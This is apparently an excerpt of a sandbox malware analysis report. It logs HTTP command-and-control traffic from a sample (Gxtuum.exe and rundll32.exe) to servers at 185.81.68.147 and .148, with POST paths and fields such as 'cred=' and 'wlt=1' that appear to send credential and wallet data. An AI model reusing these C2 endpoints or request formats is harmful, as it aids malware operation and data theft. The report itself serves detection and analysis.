                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:11.884128094 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:11 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.449745185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:10.577186108 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:11.923661947 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:11 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.449746185.81.68.148801220C:\Windows\System32\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:10.616377115 CET176OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 21
                                                              Cache-Control: no-cache
                                                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                              Data Ascii: id=246122658369&cred=
                                                              Dec 13, 2024 07:47:11.951952934 CET198INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:11 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 1
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.449747185.81.68.148803272C:\Windows\System32\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:10.638103008 CET176OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 21
                                                              Cache-Control: no-cache
                                                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                              Data Ascii: id=246122658369&cred=
                                                              Dec 13, 2024 07:47:11.970105886 CET198INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:11 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 1
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.449748185.81.68.147806828C:\Windows\SysWOW64\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:13.043967962 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 5
                                                              Cache-Control: no-cache
                                                              Data Raw: 77 6c 74 3d 31
                                                              Data Ascii: wlt=1
                                                              Dec 13, 2024 07:47:14.440793037 CET711INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:13 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 512
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                              Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.449749185.81.68.14780888C:\Windows\SysWOW64\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:13.179549932 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 5
                                                              Cache-Control: no-cache
                                                              Data Raw: 77 6c 74 3d 31
                                                              Data Ascii: wlt=1
                                                              Dec 13, 2024 07:47:14.549736977 CET711INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:13 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 512
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                              Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.449750185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:13.515197039 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:14.878485918 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:14 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.449751185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:13.547077894 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:14.895461082 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:14 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.449752185.81.68.148806828C:\Windows\SysWOW64\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:14.570233107 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 5
                                                              Cache-Control: no-cache
                                                              Data Raw: 77 6c 74 3d 31
                                                              Data Ascii: wlt=1
                                                              Dec 13, 2024 07:47:15.970062017 CET711INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:15 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 512
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                              Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.449753185.81.68.14880888C:\Windows\SysWOW64\rundll32.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:14.672689915 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 5
                                                              Cache-Control: no-cache
                                                              Data Raw: 77 6c 74 3d 31
                                                              Data Ascii: wlt=1
                                                              Dec 13, 2024 07:47:16.063846111 CET711INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:15 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 512
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                              Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.449754185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:16.704993010 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:18.049957991 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:17 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.449755185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:16.719799042 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:18.064918995 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:17 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.449758185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:19.921533108 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:21.282970905 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:20 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.449757185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:19.921536922 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:21.332618952 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:20 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.449759185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:23.031424999 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:24.376986027 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:23 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.449760185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:23.079931021 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 4
                                                              Cache-Control: no-cache
                                                              Data Raw: 73 74 3d 73
                                                              Data Ascii: st=s
                                                              Dec 13, 2024 07:47:24.424125910 CET205INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:23 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 8
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                              Data Ascii: <c>3<d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.449761185.81.68.147806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:26.016742945 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.147
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                              Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
                                                              Dec 13, 2024 07:47:27.397629023 CET204INHTTP/1.1 200 OK
                                                              Date: Fri, 13 Dec 2024 14:47:26 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                              X-Powered-By: PHP/8.2.12
                                                              Content-Length: 7
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                              Data Ascii: <c><d>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.449762185.81.68.148806968C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 13, 2024 07:47:26.064805031 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Host: 185.81.68.148
                                                              Content-Length: 154
                                                              Cache-Control: no-cache
                                                              Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
